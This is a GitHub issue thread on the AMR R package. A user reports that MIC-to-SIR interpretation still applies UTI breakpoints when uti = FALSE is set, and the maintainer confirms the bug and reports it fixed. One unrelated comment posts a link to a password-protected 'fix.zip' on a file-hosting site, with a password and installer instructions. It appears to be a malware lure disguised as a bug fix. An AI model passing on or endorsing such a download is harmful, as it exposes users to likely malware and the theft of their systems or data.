### ISSUE TITLE
uti is false bug?

### ISSUE THREAD

**Issue by theanita1** [msberends/AMR#163]
ran a transformation of MIC to SIR with the following code
`agar<- agar %>% mutate_if(is.mic, as.sir, guideline = "EUCAST 2023", add_intrinsic_resistance = F, include_PKPD = F, uti = F)
`
However, in the console, I received the following note:
![image](https://github.com/user-attachments/assets/50401987-cf07-4806-9d06-64d40f3d52a9)

When I look at the sir_interpretation_history, overall 10% of the interpretation has been defined as UTI - have a csv of the sir interpretation history but it's too big - if it would be helpful can try and split just let me know

I know we've previously had this conversation (#108) but I can't see anything in there that would help. Am using package version 2.1.1.9068

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by msberends** [comment]
I'll try to check it this week, that's weird.

So you're saying, it should never take UTI-breakpoints if you're setting `uti = FALSE` explicitly? I would think so myself 🙂

**Comment by theanita1** [comment]
Yes, all my isolates are blood, so there should be no UTI interpretations

I ran the same code again but with only one year of data and saved as csv if that can be of help to see which drug/bug combos are going awry. 

[AGAR sir_interpretation_history.zip](https://github.com/user-attachments/files/16755397/AGAR.sir_interpretation_history.zip)

Hopefully it's a quick fix because I need to clean my data haha

**Comment by msberends** [comment]
Yes, I think the function should default to (kind of) 'unknown' and then force TRUE or FALSE based on the user's choice. I'll look into it.

**Comment by msberends** [comment]
This is now fixed in the latest beta version.
